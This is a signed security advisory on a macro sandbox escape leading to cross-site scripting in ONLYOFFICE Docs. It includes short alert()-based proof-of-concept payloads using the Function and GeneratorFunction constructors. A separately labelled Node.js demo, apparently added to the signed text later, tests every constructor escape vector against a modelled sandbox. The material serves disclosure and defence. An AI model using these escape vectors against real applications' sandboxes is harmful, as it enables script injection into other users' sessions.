-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID:               SYSS-2023-027
Product:                   ONLYOFFICE Docs
Manufacturer:              Ascensio System SIA
Affected Version(s):       All versions prior to 8.1.0
Tested Version(s):         7.5.0, 8.0.1 and 8.1.0
Vulnerability Type:        Cross-Site Scripting (CWE-79)
Risk Level:                Medium
Solution Status:           Fixed
Manufacturer Notification: 2023-11-15
Solution Date:             2024-06-19
Public Disclosure:         2024-09-05
CVE Reference:             CVE-2023-50883, CVE-2024-44085
Author of Advisory:        Anton Fabricius, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

ONLYOFFICE Docs is an open-source office suite for creating, editing, and collaborating on documents, spreadsheets, and presentations. It is comparable to office suites such as Microsoft Office and LibreOffice, but is designed to be used online.

The manufacturer describes the product as follows (see [1]):

"ONLYOFFICE Docs, a powerful online editor for text documents, spreadsheets, presentations, forms and PDF reader for the platform you use"

As documented in CVE-2021-43446 [2], the "macros" feature of the online editor was previously vulnerable to cross-site scripting. The vendor addressed that report by adding a sandbox. Due to improper sandboxing and missing sanitization of user input, the macro feature is vulnerable to a sandbox escape that again leads to cross-site scripting.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

Macros are defined as an immediately invoked function expression (IIFE) of the following form:

(function(){})();

The IIFE is passed to the JavaScript function "eval()" inside a sandboxing method. Because the macro source is not sanitized, the sandbox can be escaped by reaching the "Function" constructor through the "constructor" property of any function literal, e.g. "(function(){}).constructor", which dynamically creates a new function from a string without the macro ever naming the "Function" global directly.
Unlike "eval" (which, when called directly, has access to the local scope of the calling function), the "Function" constructor compiles its body in the global scope [3]. A function created this way therefore runs outside the local scope of the sandboxing method, so whatever the sandboxing method sets up in that local scope does not apply to it.

The original sandbox escape vector was fixed with the release of version 8.0.1. However, the issue persisted up to version 8.1.0, because the mitigation can be bypassed by using the "GeneratorFunction" constructor instead of "Function": it is reachable in the same way through the "constructor" property of a generator function literal and likewise compiles its body in the global scope. The body of the resulting generator executes on the first call to "next()".

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

Entering the following payload as the value of a macro escapes the sandbox and executes the JavaScript function "alert()" in the global scope of the application when the macro is run.

Versions before 8.0.1:

(function(){}).constructor("alert(document.domain)")();

Versions before 8.1.0:

((function*(){}).constructor('alert(document.domain)'))().next()

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Update to ONLYOFFICE Docs version 8.1.0 or later. As a workaround, remove or disable the macro plug-in feature.
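The following JavaScript is added here as an illustration of the escape mechanism described above; it is not code from ONLYOFFICE, SySS or this advisory. It models an eval()-based sandbox of the kind the advisory describes, runs the two escape vectors through it, and audits which of the four function-constructor intrinsics of the language (Function, GeneratorFunction, AsyncFunction, AsyncGeneratorFunction) reach the real global scope. The wrapper, the denylist variant and the canary names are assumptions made for the demonstration: the advisory does not describe how the vendor's 8.0.1 fix was implemented, and the two async constructors are included as a general check, not as a claim about any ONLYOFFICE version. It runs under Node.js.

```javascript
// Added example (not ONLYOFFICE or SySS code): a model of an eval()-based
// macro sandbox, the two escape vectors from this advisory, and an audit that
// tries every intrinsic function constructor against a given sandbox.
// Run with: node sandbox-escape-demo.js

// Constructed canary on the real global object. A contained macro must not be
// able to read it or write next to it.
globalThis.sandboxCanary = "reached-global-scope";
globalThis.leakedCanary = undefined;

// Hypothetical sandbox in the style described in the advisory: shadow some
// globals as parameters of a wrapper function and direct-eval the macro text
// inside it. Direct eval resolves identifiers in the wrapper's scope, so a
// macro that simply writes `sandboxCanary` or `globalThis` sees undefined.
function naiveSandbox(macroSource) {
  return (function (sandboxCanary, globalThis, window, document, Function) {
    return eval(macroSource);
  })(undefined, undefined, undefined, undefined, undefined);
}

// Hypothetical denylist hardening (an assumption, not the vendor's 8.0.1 fix):
// reject macro text that spells out the first PoC's constructor access.
// It says nothing about `function*`, `async function` or property-name
// tricks such as `["const" + "ructor"]`, which is the weakness this models.
function denylistSandbox(macroSource) {
  if (macroSource.includes("(function(){}).constructor")) {
    throw new Error("macro rejected by denylist");
  }
  return naiveSandbox(macroSource);
}

// Macro body compiled by each constructor. It runs in the global scope, where
// `globalThis` and `sandboxCanary` are the real bindings, not the shadows.
const LEAK = "globalThis.leakedCanary = sandboxCanary";

// One vector per intrinsic that compiles source in the global scope.
const VECTORS = {
  // Vector fixed in 8.0.1: Function via an ordinary function's .constructor
  Function: `(function(){}).constructor("${LEAK}")()`,
  // Vector fixed in 8.1.0: GeneratorFunction; .next() runs the body
  GeneratorFunction: `((function*(){}).constructor("${LEAK}"))().next()`,
  // Remaining intrinsics, listed so the audit is complete. The advisory makes
  // no claim about these against any ONLYOFFICE version. An async body runs
  // synchronously up to its first await, so the write is visible immediately.
  AsyncFunction: `(async function(){}).constructor("${LEAK}")()`,
  AsyncGeneratorFunction: `((async function*(){}).constructor("${LEAK}"))().next()`,
};

// Runs one macro through `sandbox` and reports whether the global canary was
// copied out: true means the macro executed in the real global scope.
function escapes(sandbox, macroSource) {
  globalThis.leakedCanary = undefined;
  try {
    sandbox(macroSource);
  } catch (e) {
    // Rejected by a denylist or failed inside the wrapper: no escape observed.
  }
  return globalThis.leakedCanary === globalThis.sandboxCanary;
}

// Tries every vector and returns { vectorName: escaped } for the sandbox.
function auditSandbox(sandbox) {
  const report = {};
  for (const [name, source] of Object.entries(VECTORS)) {
    report[name] = escapes(sandbox, source);
  }
  return report;
}

// Shadowing does stop a macro that reaches for the global directly...
console.log("direct access leaks:", escapes(naiveSandbox, LEAK)); // false
// ...but every constructor vector reaches the global scope.
console.log("naive sandbox:", auditSandbox(naiveSandbox));
// The denylist stops the literal first vector and nothing else.
console.log("denylist sandbox:", auditSandbox(denylistSandbox));
```

The audit function can be pointed at any sandbox wrapper that takes macro text and evaluates it. Its result for the denylist variant mirrors the version history in this advisory: a filter that recognises one spelling of the escape leaves the others intact, because the whole Function family is reachable from any function literal's "constructor" property rather than from a global name the sandbox could shadow. A text filter is therefore not a security boundary for code that is evaluated in the application's own realm; executing macros in a separate realm, for example a sandboxed iframe or a worker that has no access to the editor's origin, removes the global scope that these constructors reach.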
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2023-11-10: Vulnerability discovered
2023-11-15: Vulnerability reported to manufacturer
2024-02-26: Initial fix of the vulnerability introduced in version 8.0.1
2024-04-15: Alternative way of exploitation discovered
2024-04-15: Reported to manufacturer that the vulnerability still persists
2024-06-19: Vulnerability fixed in version 8.1.0
2024-09-05: Public disclosure

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for ONLYOFFICE Docs
    https://www.onlyoffice.com/office-suite.aspx
[2] NVD entry for CVE-2021-43446
    https://nvd.nist.gov/vuln/detail/CVE-2021-43446
[3] MDN Web Docs: Global objects - Function() constructor
    https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Function/Function
[4] SySS Security Advisory SYSS-2023-027
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2023-027.txt
[5] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Anton Fabricius of SySS GmbH.

E-Mail: anton.fabricius@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Anton_Fabricius.asc
Key Fingerprint: 7E4A CE2E 2334 832E 21DC 6D26 3D41 5992 1805 5A0A

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEfkrOLiM0gy4h3G0mPUFZkhgFWgoFAmbZqekACgkQPUFZkhgF
WgrFnxAAi8kb9CT6JuIJ9nqJirxzUU+FIc8OJEN7OXosEbzHQN+7XEnD3omJDvD7
1c2AuNultgAK8rAMA2rfz3bSNjlMhpANdmRRY23Sz1+N9JWjQtV6gepubujH4utk
P4d3DodPOzCvHJMl+x5ZQCY5mEJA16Ae+4KCd0fC2DW3qJ6K8NGX0qR9gWWYKRXT
+dgxpIMkV/tEAr0g5vm2pMIn5rXahAb7sJ0y8Z6BPK6rZzFqcgWn4o/+BeVW2n2e
VE9lRbwfXGwK1kW2pfXO/u63grvri+txsgsDoZaSq4NHchYtwdPlmDxLSrctSI32
o2eXEaiDvFtFE7fb8XAOMuGp7v3+OsK1rdUeUazFGTw8xJxB3IteqfmNB+8Mr3wp
DaCv0Cl3VD7UU5RQysDkNZv0LBFZY1yRTfWwzm96khEqksP49aygTODmWHRqPMsj
453wFi8Z0wf2EvpR69AEiL1eUAu13Dsx4W11jPfSh+PLhflCuxeZrspeuvOaR3+t
caJ7ki1rFHL6MCjecfXrW8inQ4J2NQyPe0Rfjgqd4stTaHAZdTqXniFbLWLWuwZ1
mgRA1VWMDyGDLcEtJcUUP4XI+zbqJp2TmQdFkmqNi6G6z28R0Df9zd813ess6S8h
aMJIxUfyZHbidnezYUMWq3FvQ65fqlQPYT4G/H42o556gJi0W28=
=QaRF
-----END PGP SIGNATURE-----